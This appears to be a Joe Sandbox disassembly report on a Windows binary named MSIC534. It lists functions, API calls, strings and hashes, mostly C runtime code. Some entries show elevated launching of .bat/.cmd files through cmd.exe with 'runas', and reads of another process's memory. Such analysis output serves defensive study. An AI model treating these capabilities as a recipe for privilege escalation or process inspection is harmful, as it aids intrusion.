memcpy_s.LIBCPMT ref: 00007FF6D9C3529F
memcpy_s.LIBCPMT ref: 00007FF6D9C35390
memcpy_s.LIBCPMT ref: 00007FF6D9C353B1
memcpy_s.LIBCPMT ref: 00007FF6D9C35441
memcpy_s.LIBCPMT ref: 00007FF6D9C3554F
memcpy_s.LIBCPMT ref: 00007FF6D9C355F4
memcpy_s.LIBCPMT ref: 00007FF6D9C35640
memcpy_s.LIBCPMT ref: 00007FF6D9C35701
memcpy_s.LIBCPMT ref: 00007FF6D9C35899
memcpy_s.LIBCPMT ref: 00007FF6D9C3590B
memcpy_s.LIBCPMT ref: 00007FF6D9C35950
memcpy_s.LIBCPMT ref: 00007FF6D9C359E9
memcpy_s.LIBCPMT ref: 00007FF6D9C35B0B
memcpy_s.LIBCPMT ref: 00007FF6D9C34EE9

Part of subcall function 00007FF6D9C36454: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C36486

memcpy_s.LIBCPMT ref: 00007FF6D9C35CB6

Strings

, xrefs: 00007FF6D9C35BB4
, xrefs: 00007FF6D9C35A8C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: memcpy_s$_invalid_parameter_noinfo
String ID: $
API String ID: 2880407647-227171996
Opcode ID: 701cb34dc56a9cac992b2a95d969c89398ee0eab0c9fa9fc59a33e8c86b7dbb1
Instruction ID: f1d066f0b29b7a2e4faad7dcf120f606b75d05ffe9b966d48243b8e34e8456a6
Opcode Fuzzy Hash: 701cb34dc56a9cac992b2a95d969c89398ee0eab0c9fa9fc59a33e8c86b7dbb1
Instruction Fuzzy Hash: C803B172A182D28AE7758F75D540BFD37B5FB847C8F441136DA0A97B88DF39AA108B40

Function 00007FF6D9BF72B0 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 272threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BF1E50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9BF1F24

GetWindowsDirectoryW.KERNEL32 ref: 00007FF6D9BF744D
GetForegroundWindow.USER32 ref: 00007FF6D9BF74E8
ShellExecuteExW.SHELL32 ref: 00007FF6D9BF750D
ShellExecuteExW.SHELL32 ref: 00007FF6D9BF7551
GetProcessId.KERNEL32 ref: 00007FF6D9BF7588
AllowSetForegroundWindow.USER32 ref: 00007FF6D9BF7590
GetForegroundWindow.USER32 ref: 00007FF6D9BF75A5
GetWindowThreadProcessId.USER32 ref: 00007FF6D9BF75B0
GetCurrentThreadId.KERNEL32 ref: 00007FF6D9BF75B8
AttachThreadInput.USER32 ref: 00007FF6D9BF75C8
WaitForSingleObject.KERNEL32 ref: 00007FF6D9BF75F1
GetExitCodeProcess.KERNEL32 ref: 00007FF6D9BF75FE

Strings

runas, xrefs: 00007FF6D9BF749C
.bat, xrefs: 00007FF6D9BF7406
open, xrefs: 00007FF6D9BF74A3
.cmd, xrefs: 00007FF6D9BF7429
p, xrefs: 00007FF6D9BF7318
%s\System32\cmd.exe, xrefs: 00007FF6D9BF7457
/C ""%s" %s", xrefs: 00007FF6D9BF7474

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Window$ForegroundProcessThread$ExecuteShell$AllowAttachCodeCurrentDirectoryExitInputObjectSingleWaitWindows_invalid_parameter_noinfo
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$open$p$runas
API String ID: 2597257165-4290413618
Opcode ID: 80b171278b897e4481ec00f561564a1d4a1d7c69124deb606ecbe9a023986acd
Instruction ID: 83363240fcc2d4c5e543d6b121f20d1fcd90cbd81bf74dc297ce09a754948348
Opcode Fuzzy Hash: 80b171278b897e4481ec00f561564a1d4a1d7c69124deb606ecbe9a023986acd
Instruction Fuzzy Hash: C3C1A136B09A4686EB50CF29D89027E73B1FB85B98F414232DA5E837A8DF3DD451C740

Function 00007FF6D9C06AC7 Relevance: 31.8, APIs: 21, Instructions: 306COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06B0B
_Getctype.LIBCPMT ref: 00007FF6D9C06B3F
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06B7C
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06BA5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06BE8
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06C11
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06C50
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06C79
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06CB5
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06CDE
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06D18
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06D41
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06D7E
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06DA7
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06E04
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06E2D
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06E6F
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06E98
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C06ED2
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9C06EFB

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: 996ca0b3f0dfe8b4793054b43d57929c22226cf19784e62d5a6ad68a3a4f31f7
Instruction ID: aec2868fc6e3260983e8c1f0e87de35a7a1b47f6f1b6775e9bb93f07c98802f0
Opcode Fuzzy Hash: 996ca0b3f0dfe8b4793054b43d57929c22226cf19784e62d5a6ad68a3a4f31f7
Instruction Fuzzy Hash: C4D15CA2A19A4285FB45DF26DD412BD33B1EF60BC0F454237D98DC36A6EE7DA461C380

Function 00007FF6D9C48A80 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1223COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF6D9C48AD3
memcpy_s.LIBCPMT ref: 00007FF6D9C48DB1
memcpy_s.LIBCPMT ref: 00007FF6D9C4915B
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C49360
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C49574
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C497C8
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C499C2

Strings

1#IND, xrefs: 00007FF6D9C48BC7
1#QNAN, xrefs: 00007FF6D9C48BF3
1#INF, xrefs: 00007FF6D9C48C03
1#SNAN, xrefs: 00007FF6D9C48BEA

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: e74b7c554f0aa12a6b9c746d306bf12b71be30ff750c5c24f689410cfc5ee520
Instruction ID: 86ba1c32a1cba824dd8661c5ee93caaca80fdc614742b6ce6e43981762e0ee16
Opcode Fuzzy Hash: e74b7c554f0aa12a6b9c746d306bf12b71be30ff750c5c24f689410cfc5ee520
Instruction Fuzzy Hash: 80B28072B182928BE7658F65D9407FD36B1FB587C8F505236DA0A97A88DF38B610CF40

Function 00007FF6D9C1E4A0 Relevance: 23.8, APIs: 8, Strings: 5, Instructions: 1099COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9C1064C: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9C10661

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C1E834
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C1E840
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C1EC01
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C1EFC0
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D9C1EC0D

Part of subcall function 00007FF6D9BF32A0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9BF101D), ref: 00007FF6D9BF32B2

Strings

+, xrefs: 00007FF6D9C1F3DA
%, xrefs: 00007FF6D9C1F3C7
0123456789-, xrefs: 00007FF6D9C1E547
0123456789-, xrefs: 00007FF6D9C1ECC7
%.0Lf, xrefs: 00007FF6D9C1E540, 00007FF6D9C1E8DC, 00007FF6D9C1F05C

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn$AllocLocalLockitLockit::_std::_
String ID: %$%.0Lf$+$0123456789-$0123456789-
API String ID: 4069415512-1072446943
Opcode ID: 68b818fdd4fa0d3491a4a663ffc368d1b1ade6ce1f83f0a6d6487fda03f9679b
Instruction ID: 8ea5425b193251c5452dfded07991e6043255a846d99d5847e75574dfade89c8
Opcode Fuzzy Hash: 68b818fdd4fa0d3491a4a663ffc368d1b1ade6ce1f83f0a6d6487fda03f9679b
Instruction Fuzzy Hash: 2DA2CD62B09A8585EB10DFA5E4503BD6371EB49BE8F404233DE2DA3BE9DE38D465C344

Function 00007FF6D9BF5F60 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 215libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BF58D0: GetSystemDirectoryW.KERNEL32 ref: 00007FF6D9BF591E
Part of subcall function 00007FF6D9BF58D0: LoadLibraryExW.KERNEL32 ref: 00007FF6D9BF59E8
Part of subcall function 00007FF6D9BF58D0: GetLastError.KERNEL32 ref: 00007FF6D9BF5A34

GetProcAddress.KERNEL32 ref: 00007FF6D9BF5FD3
ReadProcessMemory.KERNEL32 ref: 00007FF6D9BF6035
ReadProcessMemory.KERNEL32 ref: 00007FF6D9BF60A0
GetLastError.KERNEL32 ref: 00007FF6D9BF62D0
FreeLibrary.KERNEL32 ref: 00007FF6D9BF630E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BF6343

Strings

NtQueryInformationProcess, xrefs: 00007FF6D9BF5FCC

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorLastLibraryMemoryProcessRead$AddressDirectoryFreeLoadProcSystem_invalid_parameter_noinfo_noreturn
String ID: NtQueryInformationProcess
API String ID: 2371894688-2781105232
Opcode ID: fa4e8a4a4fe302e818cb703e1c28a202aba8cba095d5580f8156be16ff62753c
Instruction ID: b6fc6ea4a0fbdc3666b1910dd7216e672abeb9bf2ee00b66eae818317acc92aa
Opcode Fuzzy Hash: fa4e8a4a4fe302e818cb703e1c28a202aba8cba095d5580f8156be16ff62753c
Instruction Fuzzy Hash: 09B15122A18BC6CAEB208F20D8443ED73B0FB5578CF115236DA4956A69DF7DE2E5C344

Function 00007FF6D9C1B2F0 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 584COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BFF8A0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFF8B5
Part of subcall function 00007FF6D9BFF8A0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFF8DA
Part of subcall function 00007FF6D9BFF8A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFF905
Part of subcall function 00007FF6D9BFF8A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFF9A6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C1B601

Strings

%b %d %H : %M : %S %Y, xrefs: 00007FF6D9C1B9E4
%m / %d / %y, xrefs: 00007FF6D9C1B79C
:AM:am:PM:pm, xrefs: 00007FF6D9C1BB22
%H : %M, xrefs: 00007FF6D9C1B800
%H : %M : %S, xrefs: 00007FF6D9C1B89E
%d / %m / %y, xrefs: 00007FF6D9C1BAE6
%I : %M : %S %p, xrefs: 00007FF6D9C1BB11

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$_invalid_parameter_noinfo_noreturn
String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
API String ID: 533778753-2891247106
Opcode ID: 4734cba8c0ebb69a97ca93dca8d55ba972b5f41057bfdbc9d0f9bcfce3cc0323
Instruction ID: 38c47640c533178c1ba9a29b4fec1334cf58d08eb88a9543a67a803fa8e541a9
Opcode Fuzzy Hash: 4734cba8c0ebb69a97ca93dca8d55ba972b5f41057bfdbc9d0f9bcfce3cc0323
Instruction Fuzzy Hash: 03428B32A08B4686EB148F69D4501BC77B1FB4ABC8F444132EE4DA3BA9DF38E565C744

Function 00007FF6D9C26010 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 790COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6D9BFCBB0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFCBC5
Part of subcall function 00007FF6D9BFCBB0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF6D9BFCBEA
Part of subcall function 00007FF6D9BFCBB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFCC15
Part of subcall function 00007FF6D9BFCBB0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF6D9BFCCB6

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C26370
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C26700

Part of subcall function 00007FF6D9BF32A0: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D9BF101D), ref: 00007FF6D9BF32B2

_Wcsftime.LIBCMT ref: 00007FF6D9C267CD
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9C26977

Strings

!%x, xrefs: 00007FF6D9C26746
0123456789-, xrefs: 00007FF6D9C260B7
%.0Lf, xrefs: 00007FF6D9C2640A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$_invalid_parameter_noinfo_noreturn$Lockit::_Lockit::~_$AllocLocalWcsftime
String ID: !%x$%.0Lf$0123456789-
API String ID: 1237603019-778084515
Opcode ID: 00bc372d4dcd9754968869968e82af8cdb94930d39b3e0abb69084ef3b2f15b3
Instruction ID: afc9914a4bae071d38c43ca2c6b3f658aa3c952c95bafba0fb49e13a6ba41246
Opcode Fuzzy Hash: 00bc372d4dcd9754968869968e82af8cdb94930d39b3e0abb69084ef3b2f15b3
Instruction Fuzzy Hash: 8B62DE62F09A8585EB20CFA5E9103BD3771AB45BD8F045233EE5D97B9ADE38E465C300

Function 00007FF6D9BFD590 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 527COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32 ref: 00007FF6D9BFD85B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFD8A3
LocalFree.KERNEL32 ref: 00007FF6D9BFDB77
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6D9BFDBBF

Strings

+, xrefs: 00007FF6D9BFDC0F
%, xrefs: 00007FF6D9BFDBF4

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: FreeLocal_invalid_parameter_noinfo_noreturn
String ID: %$+
API String ID: 195334829-2626897407
Opcode ID: 554102ddff73537220a196dd684dd1d0855e8e44c95f376474da4f7e056b2446
Instruction ID: 441dc63a205f608436b17114798d6f2ebeb9afb3da73b6a6eb1c7dcac57d9a8f
Opcode Fuzzy Hash: 554102ddff73537220a196dd684dd1d0855e8e44c95f376474da4f7e056b2446
Instruction Fuzzy Hash: 1D221F26B19A898AFB218F64D4503FE63B1AB9678CF044232DE4C9BB99DF3DD455C340

Function 00007FF6D9C47BB4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 231COMMONLIBRARYCODE

Download Yara Rule

APIs

TranslateName.LIBCMT ref: 00007FF6D9C47C26

Part of subcall function 00007FF6D9C45B44: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C45B77

TranslateName.LIBCMT ref: 00007FF6D9C47C64
GetACP.KERNEL32(?,00000000,?,00000092,?,00007FF6D9C3D49A), ref: 00007FF6D9C47CAE
IsValidCodePage.KERNEL32(?,00000000,?,00000092,?,00007FF6D9C3D49A), ref: 00007FF6D9C47CE6
GetLocaleInfoW.KERNEL32 ref: 00007FF6D9C47E9D

Strings

utf8, xrefs: 00007FF6D9C47DC5

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: NameTranslate$CodeInfoLocalePageValid_invalid_parameter_noinfo
String ID: utf8
API String ID: 2487361160-905460609
Opcode ID: ba7ca8e1a257779dd8df9c1a03646b7fbc43847761393a49558fc2d35c8c31fc
Instruction ID: 65267ebd9a16deef67a7e84054324377be0783ef98634a9c6945047b101270ed
Opcode Fuzzy Hash: ba7ca8e1a257779dd8df9c1a03646b7fbc43847761393a49558fc2d35c8c31fc
Instruction Fuzzy Hash: 65916A36B0878286FA649F2298416BE27B4EB48BC8F444536DA4D87785DF3CF5658B40

Function 00007FF6D9C28B00 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF6D9C28B1C
RtlCaptureContext.KERNEL32 ref: 00007FF6D9C28B49
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF6D9C28B63
RtlVirtualUnwind.KERNEL32 ref: 00007FF6D9C28BA4
IsDebuggerPresent.KERNEL32 ref: 00007FF6D9C28BF8
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF6D9C28C15
UnhandledExceptionFilter.KERNEL32 ref: 00007FF6D9C28C20

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 44e6b253834ebe2b8f0a40aa827606b52057286abb5eaea34fa0ff00bf028703
Instruction ID: 24a169c562867d57a07738c25a5757adadeefb8069eafda039b6f38ef743c653
Opcode Fuzzy Hash: 44e6b253834ebe2b8f0a40aa827606b52057286abb5eaea34fa0ff00bf028703
Instruction Fuzzy Hash: B7312C72609B8186EB709F60E8503ED73B4FB88794F44503ADA4E87B98EF78D658C710

Function 00007FF6D9C41CAC Relevance: 9.3, APIs: 6, Instructions: 336timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6D9C41CF1

Part of subcall function 00007FF6D9C41B38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C41B4C

Part of subcall function 00007FF6D9C3E5C0: HeapFree.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5D6
Part of subcall function 00007FF6D9C3E5C0: GetLastError.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5E0

Part of subcall function 00007FF6D9C2DE54: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6D9C2DE02,?,?,?,?,?,00007FF6D9C2DD02), ref: 00007FF6D9C2DE5D
Part of subcall function 00007FF6D9C2DE54: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6D9C2DE02,?,?,?,?,?,00007FF6D9C2DD02), ref: 00007FF6D9C2DE82

Part of subcall function 00007FF6D9C4A534: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C4A47F

_get_daylight.LIBCMT ref: 00007FF6D9C41CE0

Part of subcall function 00007FF6D9C41B98: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C41BAC

_get_daylight.LIBCMT ref: 00007FF6D9C41F5A
_get_daylight.LIBCMT ref: 00007FF6D9C41F6B
_get_daylight.LIBCMT ref: 00007FF6D9C41F7C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D9C421C6), ref: 00007FF6D9C41FA3

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

